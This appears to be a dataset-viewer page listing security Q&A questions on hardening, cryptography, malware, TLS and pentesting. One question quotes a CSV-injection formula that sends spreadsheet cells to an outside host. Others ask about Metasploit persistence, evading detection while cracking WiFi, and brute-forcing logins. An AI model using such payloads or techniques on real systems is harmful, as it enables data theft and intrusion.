instruction stringlengths 24 29.9k |
|---|
is using metasploit post exploit tools an easy way to create a "daemon"?
I mean I can just add my awesome.exe to the payload and migrate the payload to svchost.exe and it will persist on the machine
Is this scenario possible? I mean this will be done on a local computer which could be also monitored locally using the p... |
this is the first of a series of questions on hardening Linux servers at the filesystem level.
At work I'm hardening an Ubuntu 18.04 Server following the CIS benchmark 2.0.1. Instead of just running a hardening script, I'm doing it manually in order to really understand the process. For the sake of the exercise, I am a... |
I work as software engineer in a company. The IT deparment has decided to forbid powershell execution from our computers as part of the actions they are implementing to avoid Emotet malware. As software developer I use Powershell every day. From now on, they allow us to execute powershell only as Administrator, we can ... |
Our team was hired for a red team engagement for a client. A part of the engagement is attempting to crack the WiFi passwords of their office APs. However, we obviously want to stay undetected. What kind of thing should we watch out for? Apart from the obvious things like don't let anyone see you with your laptop runni... |
I'm trying to find an OAuth provider that doesn't require a password but instead, it authenticates the user by sending a message to a phone number. I'm thinking that it would be using the phone the same way as you would use two-factor-authentication but without the password.
So far I couldn't find any. Does such provi... |
I have a Debian machine with nginx 1.14.0 (Ubuntu), and I found an exploit, https://www.rapid7.com/db/modules/exploit/linux/http/nginx_chunked_size
But, is it possible to gain access by only nmap?
|
tl;dr: My Toyota Aygo sends Text/SMS messages through Bluetooth and my mobile phone. These messages are delivered to the recipient, but there is no sign of them in my Messages app.
Should I be concern? Is this some kind of security issue?
My car (Toyota Aygo 2019+), when connected with my phone (Motorola Moto Z2 Play)... |
So, Firefox 73 rolled out today and with it comes a new DNS option called NextDNS. I thought of giving it a shot and clicked "Enable DNS over HTTPS" and selected NextDNS.
Now, my understanding of HTTPS is that it encrypts the traffic (to provide confidentiality) and prevents tampering (to check integrity). But, when I ... |
I'm curious about the actual dangers of executing shell.openExternal on untrusted content. Documentation specifically states that this can be leveraged for RCE:
Improper use of openExternal can be leveraged to compromise the user's host. When openExternal is used with untrusted content, it can be leveraged to execute ... |
Note: This question is specific to the Threema Messenger, and relates to their implementation of encryption (using the NaCl ECDH implementation as per their docs).
I refer specifically to their "note on outgoing messages" in their validation document on their website:
It may seem strange that outgoing messages can be ... |
This plugin to kubectl helps to setup OpenId Connect authentication for clients to connect to a kubernetes cluster.
In order for this to work for me authenticating against a cluster, the administrator have to hand me oidc-issuer-url, oidc-client-id and oidc-client-secret so that the tool can do its job authenticating m... |
Arbitrary "M-of-N" secret-sharing protocols are a well-studied topic in cryptography, and are apparently so useful that Bitcoin Script devoted a whole opcode to them.
In this blog post, I write:
Suppose we run a bank, and suppose that our bank stores all its gold in one big safe. And suppose that we have three people ... |
Is using the Tor network to visit the web pages in public wifi secure or not since Tor will help to make us anonymous (hide the metadata such as URLs) and HTTPS helps us to protect the content.
Will Tor and HTTPS requests together help to secure our browsing?
|
Imagine I were to provide a person with a single letter "A" and the HMAC-SHA256 hash of this message, keyed with my secret key.
Would this person be able to derive any information about my secret key? Furthermore, would this person have a way of being able to forge a valid HMAC for a similar message (e.g. the letter "B... |
I've come across a hybrid Android app - meaning most of its UI is implemented in a WebView using HTML and JavaScript technologies. The app itself is connecting to the server and one of the possible responses can include evaluate field, which is then directly executed via JavaScript's eval() command.
Is this a security ... |
During early World War I (1914–1916), Germany briefly experimented
with 'dotty' and 'dashy' Morse, in essence adding a dot or a dash at
the end of each Morse symbol. Each one was quickly broken by Allied
SIGINT, and standard Morse was restored by Spring 1916.
Source: https://en.wikipedia.org/wiki/Morse_code#Unu... |
Recently I bought an IPcamera in order to test its security. Unfortunately, it just has 2 ports open :
554/tcp RTSP
5000/tcp UPnP
I was pretty sure the ipcamera would poke my router and open up internet facing port (that's what UPnP is suppose to do, right?) through which I can test further but unfortunately that is ... |
We got a realatively high bounce rate today, because someone decided to spread some links using our mail server. The implementation looked like this:
He used the registration form and planted a link in the firstname field, which appears in the email's first line.
Then he sent out like 1200 emails like this.
And my ques... |
I am reading the book Hacking: The art of exploitation and there is a format string exploit example which attempts to overwrite an address of the dtors
with the address of a shellcode environment variable.
I work on Kali Linux 64-bit and already found out that there are no dtors (destructors of a c program) and so
now... |
During my commute from an airport located in a country whose government is known for intrusions into the privacy of its citizens and non-citizens, I had my laptop taken from me during a routine security procedure. I usually get to see my electronic devices being swabbed and X-Rayed as all of the equipment needed for th... |
Since an administrator on a Windows system can install a service that logs on as LocalSystem, is it considered bad practice to allow that service to execute programs in a directory known to be protected?
For example, the administrator loads a 3rd-party service that uses CreateProcess to launch an arbitrary executable f... |
Reading into information security, I noticed two branches. Access control when communication with external device by using some type of cryptographic authentication and encryption mechanism and things like control flow integrity. My question is why do we need the latter if former is good enough.
Are there example of c... |
I am currently working on a python program that utilizes GnuPG (with symmetric encryption) to store data on the client: User supplies password, gpg file is decrypted, data is loaded, etc.
Say an attacker copies this gpg file. What can be done to slow down brute forcing of the password? Maybe it is possible to do thousa... |
As far as of my knowledge goes, keyboard don't store keystrokes in their memory by default (excluding those bundled with keyloggers). The thing that comes to my mind though is that some keyboards do have some built-in memory for storing user's preferences (e.g. gaming keyboards). Can this be somehow reprogrammed to sto... |
When using Chrome and I select a file for upload on a website that accepts files, a Windows dialog box appears for me to select a file.
I can then paste a URL address for a file in the dialog box, and explorer.exe then invokes a process to download the file to a temporary folder, and then upload the file from the tempo... |
I just discovered that my files have been encrypted by ransomware.
Can I get my files back? How?
Should I pay the ransom?
What should I do so that this never happens again?
|
Is it possible to get logins over https when I have full control of the network?
For example, all communication at my work goes over the company firewall and I often connect to my personal server that uses TLS.
If I understand correctly, when I connect to my server, first the handshake is done, then the key exchange is... |
I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as:
=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50))
I am now trying to create a "more dangerous" payload and I see a lot of reference online using something such ... |
By default main activity of my application (HelloWorld from the Android Studio) is exported and does not require any permission to launch it.
Is there any way to protect my main activity from being launched by the other applications but at the same time leaving the possibility to run the application by the Android dev... |
I have a simple code for an input model:
public class MyClass
{
[Required]
public MyEnum? Type { get; set; }
}
Now if I do not send Type as a part of json to the request, I get this error from Web.Api:
"The JSON value could not be converted to
System.Nullable`1[MyNamespace.MyClass]. Path:
$.type | LineNum... |
I was reading digital forensics as part of my curriculum and came across some tools used for hacking (ethical hacking aka pentration testing). There is a bunch of tools out there. I was wondering if the bad guys actually use such tools or do they make their own stuff based on specific purpose ?
|
I have a target which is a Java applet. When I reach the IP in the browser and enter credentials into a form, a .jnlp file downloads, which I need to double-click on to access the page.
Does Zap have support for scanning this types of Web apps?
Many thanks.
|
I found that a website is using a version of telerik web UI that may be vulnerable to CVE-2017-9248.
However when I use the python script with command
python script.py -k https://www.website.com/Telerik.Web.UI.DialogHandler.aspx 48 hex 9
It finds the key but is not able to find telerik version and the final link is no... |
I finished reading the Code Book by Simon Singh, I'm interested in playing with some of the ideas in the book to help increase my own understanding. I don't intend to implement the following in any consequential settings; I'm only interested in exploring the security implications.
I want to generate alternate diceware... |
I'm trying to confirm if the approach I'm thinking of taking towards verifying a self signed certificate is sound, or if I'm going about it the wrong way. I'm no security expert, so bear with me please if I make any wrong assumptions.
Following is a summary of the situation I have:
Self hosted Windows Service that can... |
There are many games that are free on torrent. Is it actually free or you just pay not with your money? Can it have a malware?
|
I recently installed the package AIDE (Advanced Intrusion Detection Environment) on my Linux server. This is a web server installed about a year ago. Since no integrity checks have been done before on this server, I can't tell if it is hacked or not.
So, if I install AIDE on this server, considering that it could be un... |
I have Ubuntu 19.10 with full disk encryption. The encryption is effective as long as the system is turned off or restarted. Otherwise the data is unencrypted behind a locked screen which may not be very secured.
I wish to protect against:
mechanisms that bypass screen lock (I have disabled SysRq, but there might be o... |
If Man-In-The-Middle is at the ISP level (or even before ISP) it seems like they could perform the handshake, swap keys supply a faked or copied cert. The only thing they wouldn't know is the private key. But it seems like if they were the client for the endpoint server, and they were the server for the victim, they ... |
There are a number of different Managed Security Service Providers (MSSPs) offering managed detection and response services. They tend to use what is called an endpoint agent, while only some use a network appliance in addition.
We have a small office network with a couple dozen endpoints. The MSSPs we are looking at o... |
During the course of my work, I was enumerating about 14 IPs and now my next task is manual checking each of the 500+ CVEs I found. I would like to sort them by severity and automate this as much as possible. Are there any tools that would help me?
|
We're using a cloud based web security (proxy) service which basically takes our web requests, scans them and NATs these requests to their public IP addresses. NAT is being done on a per-session basis, whatever that means in detail.
We now have a problem with a third party service which is essentially doing something l... |
I was wondering if casting from my YouTube account on my phone onto someone's tv gives access to my YouTube account to the owner of the tv once I stop casting.
|
This is a follow up to this question I asked before.
While I am happy to custom verify the certificate from the client side using the thumbprint approach, there is one additional scenario I wish to cover.
The scenario I'm thinking of is if a malicious user gets hold of the self signed certificate (i.e. PFX file install... |
This is the string:
UVRWUVRsUXRNRGRSUlZBdE9FTllUbGM9
I want to decode it, but I'm not sure what decoder to use.
Thanks :)
|
If you are using a vpn for anonymity you can allow cookies when you surf the internet but you must delete them once you close the browser to get complete anonymity. Is this correct?
Or is it that just allowing cookies removes anonymity?
|
If a remote hacker or a malware gains full root/admin rights on a system, is there any way to access another SATA disk that has been hardware connected but disabled in BIOS ?
I am not sure if the disabled disk even has power in that case (I guess it has not) but I found the following post which raised some doubts : htt... |
As far as I understand, Identity sends to the user an encrypted token with some user information like the user name and expiration date. Then, when a new request arrives to the server, it decrypts it and will have available all the user claims and some other information.
My question is, in case there is no need to send... |
after some extensive research I still don't know how to properly implement the following case. I think this question answers something similar, but I'm not 100% sure (Should client have access to 3rd party API access token?).
Let's say I have my resource server (my-api.com), my identity provider and authorization serve... |
I tried to export public key from my keyring. Then I imported my public key in another keyring. I find the private key too in the 2nd keyring and I can sign files from the 2nd keyring. Why is this possible?
-K = list private keys / -k = list public keys
gpg --no-default-keyring --keyring ./K -K
./K
---
sec rsa4096... |
Wikipedia states that Perfect Forward Secrecy "is a feature of specific key agreement protocols that gives assurances that session keys will not be compromised even if the private key of the server is compromised".
In the example on Wikipedia two partner us a "key exchange algorithm such as Diffie–Hellman, to securely ... |
I ran across this on namecheap.com. This question isn't about namecheap.com itself, which I have no problem trusting. Rather, what approach do you recommend in dealing with CDN scripts that have very long random names? Now, I know they're most likely just how the main site decided to refer to external utility script... |
I've been cracking a box and I came across a password list and another file with the pass configuration. $hash= md5($salt . pass . salt) I have both salts and the password hash.
I tried with this syntax : hashcat -m 3800 -a 0 '/path/to/pass/list' '/path/to/dictionary/list' No devices found/left
It gives me nothing on r... |
Quick question, having trouble finding any information online relating to that specific year for the given version thttpd 2.25b 29dec2003. Need to explain what vulnerabilities this may have had, if it had any at all. Any help would be appreciated.
|
Last night I started getting the following warning on all of my servers when accessing github.com.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right... |
When buying the theater tickets in the site biletru.co.il I was required for the email address and its password. Why ? If it is dangerous to enter the password in this case ?
|
I'm using the Hydra tool on Kali Linux 2020.1 and I'm trying to brute force a login at hack.me http://s123056-104737-qer.sipontum.hack.me/login.php.
My problem is that whenever I run Hydra it gets stuck.
I used Burp Suite to get the cookies and the failure string "invalid"
I also got the IP via Burp (and also tried usi... |
I can't get rid of ad.doubleclick.net malware from my PC.
I am using Firefox and it seems that all links that lead to www.googleadservices.com are redirected to https://ad.doubleclick.net/ddm/*** which can't load it self.
So if I click the below link
I get this result:
I tried AdwCleaner from Malwarebytes but it did ... |
Quoting from a long-dead Auth0 forum post: https://community.auth0.com/t/why-is-storing-tokens-in-memory-recommended/17742
"Any values stored in memory are still vulnerable to XSS attacks since
they’re accessible by JavaScript. Agreed?
Agreed. The main difference is that localStorage makes it even easier
to enumerate ... |
I know that arp spoofing is required on a LAN network due to the fact that data is sent directly to a destination, but what about for a WLAN network? All packets can be seen if you are in promiscuous mode, so is there any point of arp spoofing?
|
If hashes cannot be decrypted, then what is the point of using stronger hashes? Since are only uncrackable via brute force through hashing the text and comparing the hashed password, won't it be cracked in the same amount of time, no matter what hash you're using?
|
This question was prompted by a long Wikipedia session with me reading tons of articles on cryptography, causing far more questions than it answered.
Let's say that I and another person know each other. We plan to do something important and dangerous. We need to send messages back and forth long-distance. We conclude t... |
Security noob here. I've been trying to figure out how to secure my web app from both CSRF and XSS. It's a single-page app that talks to a JSON API on the server side.
I'm trying not to do a roll-your-own scheme, but haven't had much luck finding one that does not have the complexity of OAuth.
Here's my proposed scheme... |
Question about PEAP-MSCHAPV2 on RADIUS.
After MSCHAPV2 success keys are extracted from TLS context. Then it sent to AP.
Client failed to connect WiFi (or eapol, etc) with my handmade RADIUS Access-Accept.
Can you explain full keys negotiation?
Radius source code implementations based on state machines, so code is diffi... |
I recently set up a server from an old computer case. I use docker to install and use different services on different ports and I would like to access some services from outside of my house.
I have a domain from namecheap and I set up dynamic dns which successfully sends my public IP to my domain periodically. Here’s t... |
Pardon me if I am wrong, however, I am looking for an answer for my understanding that isn't the concerns regarding CSRF solved by both Samesite cookie and Same-Origin-Policy effectively? Then why is the need for 2 different things?
The basic difference which I can recollect:
Same-Origin-Policy (SOP): Is a policy set b... |
Does the kind of algorithm used to hash passwords have any advantages or disadvantages in a dictionary attack? i.e. SHA256, MD5, etc. or is it just the dictionary that is used by the attacker matters?
As far as I can understand, the hashing algorithm does not have any effect on protection against the dictionary attack... |
My understanding is that in TOTPs are like HMAC where code is derived from time.
However, I am struggling to understand the concept of Backup Codes in Google Authenticator, and how are they calculated as they are not time sensitive and can be used in any sequence. So how Google has implemented that?
|
I have Android 8 mobile phone and I need to give it for mobile repair center for battery replacement. There is chip car, but there are lot of data in my phone.
What I want to know is it enough having Android Lock Screen? Can repairmen access my data?
|
Packed an AutoHotkey script with ahk2exe using MPress, got 13 hits on the VirusTotal online scan for the zipped result. Packed the same script with the same ahk2exe without MPress and got just 6 hits on the zipped result. Zip performed with identical 7z defaults in both cases.
Some of the virus agents associated with r... |
I am wondering what risks there are if you have static pages on the same host that don't trust each other.
A key concept of Javascript and web security is the Same Origin Policy (SOP), which is also the reason why we need to avoid XSS. If there's e.g. a blog on example.org with an admin interface on example.org/admin a... |
I have the plaintext and the encrypted(?) output.
Maybe you guys know which method is used for this encrytion.
I was thinking about Base64 because of the "=" termination, but i'm not sure because of the slashs.
Any idea?
Plaintext: 12345
Decrypted: /A/P9nt/Ig/Ll/Z8=
The decrypted password was stored as a value in windo... |
I had an exam question on why security canaries should be short. I suspect that is so that the attacker has a harder time finding the canary. Is that right?
|
I am building an application using AWS Lambda and using a MongoDB database hosted directly with MongoDB (Atlas). For some reason, I get an error when trying to connect via SSL and I've been working on it for days without any luck.
What are the risks, I mean real-world risks including scenarios, of using a non-secure co... |
Although this question may be out of scope, I'm wondering if there's a reliable way to apply a "digital signature" to real life objects in order to prove your ownership of them to a degree.
As an example, let's assume I bought my own office chair for the workplace, and it may be physically indistinguishable from the ot... |
What is the purpose of embedding a Secure Element to enhance the security - especially the storage of keys- if a key is required to connect with it in order to get its secrets?
For example:
Let's suppose I have a host that is not secure enough to store keys in its ROM. I will hence store keys in a remote Secure Element... |
I am trying to get my hands on some crypto-mining malware samples for my academic research and have tried to access VT and Virusign but both required registration I have emailed them asking for access and I am still waiting.
But for now my question is, is there a website where I can download a package of crypto-mining ... |
When installing Manjaro Linux, it shows the following screen:
What's the logic behind that?
|
I have three SATA hard drives that I use every day. Suppose I disable the corresponding SATA ports of these hard drives through my BIOS, add another storage device to my PC, install another instance of Windows 10 and run unsafe executables on it - would my three SATA hard drives be completely isolated and safe?
As I un... |
Do CAs issue intermediate Certificate for each new certificate?
I am new to certificates and asking this to understand if the CAs have a ready set of intermediate certificates they use to issue leaf certificate or the its created based on the Certificate Request information provided by the requester?
|
I'm currently undergoing a penetration testing course where I discover the basics and I have a task where I need to perform SNMP enumeration on a target.
My working environment is as follows :
Host : Windows 10 (64-bit)
Oracle VM VirutalBox machines :
Kali Linux 2019.4 (64-bit) : attacker machine, 4GB of RAM, 4 vCPU... |
An Android application that has SSL Pinning was successfully tested on a mobile device running Android 6 (with the certificates installed) using Burp proxy and OWASP ZAP Proxy. As expected the application refused connections when using either proxy.
However, when tested using Charles Proxy it was possible to intercept ... |
Talking with people, it is frequently considered that having a mobile application without certificate pinning is a vulnerability. But I rarely see people mentioning it for web applications.
The question is, why is this issue only mentioned for mobile apps? Is there a higher risk derived out of this vulnerability on mob... |
I am working on a task where I have to evaluate how much throughput one can generate in packets per second. I know I can send them as fast as possible with hping3 [...] --flood, but is there a way to calculate their number reliably for a single host?
|
As a protection against attacks such as SSLstrip, the HSTS header prevents an attacker from downgrading a connection from HTTPS to HTTP, as long as the attributes of the header are properly configured.
However, HTTP/2, whilst not making encryption mandatory is implemented with mandatory TLS connection in modern browser... |
Running SNYK scanning on my code base I find a number of HIGH vulnerabilities when I include the npm dev dependencies (e.g. running SNYK -dev test --file=package.json).
Examples of vulnerabilities:
https://app.snyk.io/vuln/SNYK-JS-SERIALIZEJAVASCRIPT-536840
https://app.snyk.io/vuln/SNYK-JS-NODESASS-540974
What are yo... |
The NIST AAL3 specification requires
In order to authenticate at AAL3, claimants SHALL prove possession and
control of two distinct authentication factors through secure
authentication protocol(s)
Consider a Windows 10 tablet device with a Hardware TPM (v2.0) and Windows Hello for Business. The private keys for ... |
I've seen some threads on Reddit that say true hackers, when attacking, go through a public WiFi network, use a VM, proxy through a zombie computer, use a VPN, then proxychain through Tor, use another VPN, etc.... My question is, what makes this anymore secure than just proxychaining through Tor? Doing so routes all co... |
Sir I lost my private key and I have got a message to decrypt it’s asking me for my private key from past 10 days I am trying . But nothing worked . My only hopes is u sir
|
We have small network with ~20 clients (Wifi and Lan). I captured a few seconds of our network traffic with wireshark and encountered a lot of TLSCiphertext length MUST NOT exceed 2^14 + 2048 errors in the expert analysis for different IPs. Below a screenshot of the filter ssl.record.length.invalid. The destination is... |
I've been trying to get mentioned security error working on my machine so I could fully understand how it works. I've been following those instructions: https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
and using this tools:
https://github.com/googleprojectzero/symboliclink-testing-tools/
Create (or c... |
struct record {
char name[24];
char * message;
};
int main() {
puts("GOT Overwrite");
// Create the struct record
struct record student;
strcpy(student.name, "Alice");
student.message = (char *) malloc(sizeof(char) * 24);
strcpy(student.message, "hello world");
printf("Message from %s: (%s)\n", student.name, student.... |
After the POODLE vulnerability was publicized, can MITM attacks now see https traffic? Previously only http websites showed info when sniffed, but now, what about https websites?
|
I have a box with 2019 Windows Datacenter in one domain, and I have Windows Datacenter 2019 in a completely different domain - I am looking for the best way to connect the two and keep the data secure. I would like to establish the connection so that they can file-share and access each other directories. This may be an... |
Using Sandboxie typing net user some_user some_password, on a sandboxed cmd, actually changes the password of the real user. Is this intentional?
It is just a default Sandboxie installation running on Windows 10 1903. I ran cmd by right-clicking the shortcut and selecting "Run with Sandboxie"
|
According to:
https://docs.python.org/3/library/http.server.html
Warning http.server is not recommended for production. It only implements basic security checks.
It doesn't state what security vulnerabilities the server is exposed to. I'm a sysadmin and have a dev team that wants to push this to production (My unders... |
I came to know that the malicious activities will be carried out only by a software(program) whereas the malicious files(data to the softwares installed in the system) can't perform the malicious activities directly by themselves but they can responsible for bringing those malicious softwares to the system( say like st... |
I have a static-page website that I need to pentest. What I mean by this is that the site does not have a database, and it has no area to submit user input except for to a third party payment service that is managed entirely by them.
I have actually done web app pentesting before and found vulnerabilities such as XSS, ... |
I realize that a hash function is a one way function, and that changes in the hash are suppose to tell us that the original data has changed (that the entire hash changes on even the slightest changes to data).
But is there a way to find out to what degree has the original data changed when two hashes are different?
|
I am using a web service (call it X) which allows files to be uploaded to AWS S3.
The way it works is that an initial call is made to X which then returns a list of file descriptors and also meta information which should be injected into the web form as hidden fields that the user is presented with to choose a file to... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.